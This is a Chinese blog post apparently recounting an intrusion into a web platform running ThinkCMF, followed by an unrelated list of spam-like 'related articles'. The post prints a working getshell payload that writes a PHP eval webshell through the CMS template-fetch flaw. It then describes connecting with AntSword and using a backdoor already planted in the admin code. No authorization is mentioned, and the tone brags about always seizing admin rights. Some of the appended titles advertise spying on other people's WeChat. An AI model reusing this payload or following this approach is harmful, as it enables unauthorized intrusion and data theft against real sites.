渗透小计之「竟然有人在wangle平台代码里下毒」

访客4年前黑客工具754

print by 猩猩安全团队——作者:hurnme、flyingdemon

引言

记一次对某网D平台的渗透,以及发现其后台源码存在后门的过程

确定目标CMS

拿到其ip之后先信息搜集搜了了一波,确定目标使用的是ThinkCMF。

进去之后在url处构造报错

写入一句话

查看到ThinkPHP版本崴3.2.3,那么对应的thinkCMF版本应该存在前台getshell的洞。废话不多说,直接构造payload一发入魂。

?a=fetch&templateFile=public/index&prefix=''&content=<php>file_put_contents('shell.php','<?php @eval($_POST[" ***  *** 521"]);?>')</php>

写入shell之后连接蚁剑,直接拿下

鄙人在渗透的过程中一直有一个习惯,那就是无论如何都要拿到后台管理员权限,不拿后台权限就浑身不得劲,即使拿下了主机,也是吃嘛嘛不香。没拿到后台就拿下主机,那和没确定关系就 *** 有什么区别!

进入♂后台

一开始的思路是读取其config.php文件连接他的数据库,在拿到了数据库账号和密码的时候怎么连也连不上去,小伙伴提供了另一条思路,修改后台登录逻辑,直捣黄龙。

正在我要修改后台登录逻辑的时,浏览代码的过程中无意之中发现了一个好玩的线索。

这。。。这TM。。。有人在代码里下毒。

拿着不知道是哪位好心人留下的后门,含泪登录了后台。

帮这个主机免费做了一次入侵检测,没有发现我们进入之前被入侵的痕迹,盲猜可能是这个平台自带后门。


相关文章

黑客可以找丢失-黑客军团第二季演员(黑客军团多少季)

黑客可以找丢失-黑客军团第二季演员(黑客军团多少季)

黑客可以找丢失相关问题 有没有黑客刷yy币的相关问题 地痞街区黑客怎么入侵 得容人处且容人(用人之长容人之短)...

偷查别人考研成绩_黑客封号软件

如今很多台式机电脑和笔记本电脑都有配备一块独立显卡以提高电脑的图像处理性能,我们可以通过对独立显卡进行设置来改善软件呈现的图像效果,下面小编就告诉大家电脑的独立显卡设置在哪里打开。 2、确认显卡驱动...

夹竹桃有毒吗(夹竹桃的养殖方法)

  夹竹桃有毒吗(夹竹桃的养殖方法)夹竹桃又叫柳叶桃、半年红、甲子桃,属于夹竹桃科夹竹桃属,原产于印度、伊朗、阿富汗,是个外来品种。夹竹桃是一种喜欢充足的阳光,温暖和湿润环境的常绿直立大灌木,它的花朵...

深圳商务预约联系方式个人微信号

.深圳私人定制商务微信号,有许多人都想了解,你可以在线上或者线下搜索或寻找,找专业人士,或者本地人去帮你,世上无难事,只怕有心人,相信你一定可以的对于“深圳商务预约联系方式个人微信号,贵阳商务特经纪人...

央行两天投放基础货币1.7万亿元怎么回事 这意味着什么

【国务院发布应对新型冠状病毒感染的肺炎疫情联防联控机制】#央行两天投放基础货币1.7万亿元#国务院应对新型冠状病毒感染的肺炎疫情联防联控机制举行新闻发布会,请财政部、中国人民银行、国家税务总局、中国银...

怎么偷上别人的微信(远程查看对象微信聊天)

万事开头难的道理,想必咱们不仅仅知道,还有许多人深有体会。在咱们日子中,遇到的波折与困难各式各样,就说一个很常见的,你翻开微信,看着里边百八十个老友,可是划来划去没有也没有挑选一个开端谈天。 你可能...